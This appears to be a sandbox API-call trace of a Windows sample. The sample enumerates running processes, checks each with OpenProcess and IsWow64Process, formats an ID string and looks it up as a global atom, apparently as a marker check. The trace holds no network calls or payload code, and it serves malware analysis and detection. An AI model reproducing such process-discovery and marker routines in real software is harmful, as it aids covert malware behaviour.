	[0097.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.844] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0097.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.844] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0097.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x658e68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0097.844] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0097.844] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.844] CloseHandle (hObject=0x248) returned 1
	[0097.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x658de8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0097.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0097.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0097.845] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.845] CloseHandle (hObject=0x248) returned 1
	[0097.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0097.845] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.845] CloseHandle (hObject=0x248) returned 1
	[0097.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.846] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0097.846] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.846] CloseHandle (hObject=0x248) returned 1
	[0097.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.846] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0097.846] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.846] CloseHandle (hObject=0x248) returned 1
	[0097.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x658e68, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0097.846] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0097.846] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.846] CloseHandle (hObject=0x248) returned 1
	[0097.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.847] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0097.847] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.847] CloseHandle (hObject=0x248) returned 1
	[0097.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.847] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0097.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.847] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0097.847] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.847] CloseHandle (hObject=0x248) returned 1
	[0097.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.847] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0097.847] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.847] CloseHandle (hObject=0x248) returned 1
	[0097.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.848] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0097.848] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.848] CloseHandle (hObject=0x248) returned 1
	[0097.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x658de8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0097.848] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0097.848] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.848] CloseHandle (hObject=0x248) returned 1
	[0097.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x658f68, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0097.848] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0097.848] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.848] CloseHandle (hObject=0x248) returned 1
	[0097.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x65ade8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0097.849] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0097.849] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.849] CloseHandle (hObject=0x248) returned 1
	[0097.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x658f68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0097.849] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0097.849] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.849] CloseHandle (hObject=0x248) returned 1
	[0097.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x658c68, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0097.849] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0097.849] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.850] CloseHandle (hObject=0x248) returned 1
	[0097.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x658f68, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0097.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0097.850] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.850] CloseHandle (hObject=0x248) returned 1
	[0097.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0097.850] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.850] CloseHandle (hObject=0x248) returned 1
	[0097.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0097.850] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.851] CloseHandle (hObject=0x248) returned 1
	[0097.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x6590a8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0097.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0097.851] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.851] CloseHandle (hObject=0x248) returned 1
	[0097.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x658dc8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0097.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0097.851] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.851] CloseHandle (hObject=0x248) returned 1
	[0097.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0097.851] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.851] CloseHandle (hObject=0x248) returned 1
	[0097.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0097.852] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.852] CloseHandle (hObject=0x248) returned 1
	[0097.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x658a60, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0097.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0097.852] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.852] CloseHandle (hObject=0x248) returned 1
	[0097.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0097.852] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.852] CloseHandle (hObject=0x248) returned 1
	[0097.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x64fe78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0097.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0097.853] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.853] CloseHandle (hObject=0x248) returned 1
	[0097.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x6590a8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0097.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0097.853] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.853] CloseHandle (hObject=0x248) returned 1
	[0097.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x64fe90, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0097.853] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.853] CloseHandle (hObject=0x248) returned 1
	[0097.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x658d28, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0097.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0097.854] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.854] CloseHandle (hObject=0x248) returned 1
	[0097.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x658c68, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0097.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0097.854] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.854] CloseHandle (hObject=0x248) returned 1
	[0097.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x658c90, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0097.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0097.854] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.854] CloseHandle (hObject=0x248) returned 1
	[0097.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.855] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0097.856] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0097.856] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.856] GetLastError () returned 0x5
	[0097.857] GetLastError () returned 0x5
	[0097.857] GetLastError () returned 0x5
	[0097.857] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0097.857] GetLastError () returned 0x5
	[0097.857] GetLastError () returned 0x5
	[0097.857] GetLastError () returned 0x5
	[0097.857] GetLastError () returned 0x5
	[0097.857] GetLastError () returned 0x5
	[0097.857] GetLastError () returned 0x5
	[0097.857] GetLastError () returned 0x5
	[0097.857] GetLastError () returned 0x5
	[0097.857] GetLastError () returned 0x5
	[0097.857] GetLastError () returned 0x5
	[0097.857] GetLastError () returned 0x5
	[0097.857] GetLastError () returned 0x5
	[0097.857] GetLastError () returned 0x5
	[0097.857] GetLastError () returned 0x5
	[0097.857] GetLastError () returned 0x5
	[0097.857] GetLastError () returned 0x5
	[0097.857] GetLastError () returned 0x5
	[0097.857] GetLastError () returned 0x5
	[0097.857] GetLastError () returned 0x5
	[0097.857] GetLastError () returned 0x5
	[0097.857] GetLastError () returned 0x5
	[0097.857] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.891] GetLastError () returned 0x5
	[0097.892] GetLastError () returned 0x5
	[0097.892] GetLastError () returned 0x5
	[0097.892] GetLastError () returned 0x5
	[0097.892] GetLastError () returned 0x5
	[0097.892] GetLastError () returned 0x5
	[0097.892] GetLastError () returned 0x5
	[0097.892] GetLastError () returned 0x5
	[0097.892] GetLastError () returned 0x5
	[0097.892] GetLastError () returned 0x5
	[0097.892] GetLastError () returned 0x5
	[0097.892] GetLastError () returned 0x5
	[0097.892] GetLastError () returned 0x5
	[0097.892] GetLastError () returned 0x5
	[0097.892] GetLastError () returned 0x5
	[0097.892] GetLastError () returned 0x5
	[0097.892] GetLastError () returned 0x5
	[0097.892] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0097.892] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0097.892] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0097.892] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0097.892] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0097.892] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0097.892] CloseHandle (hObject=0x248) returned 1
	[0097.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0097.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0097.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0097.893] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.893] CloseHandle (hObject=0x248) returned 1
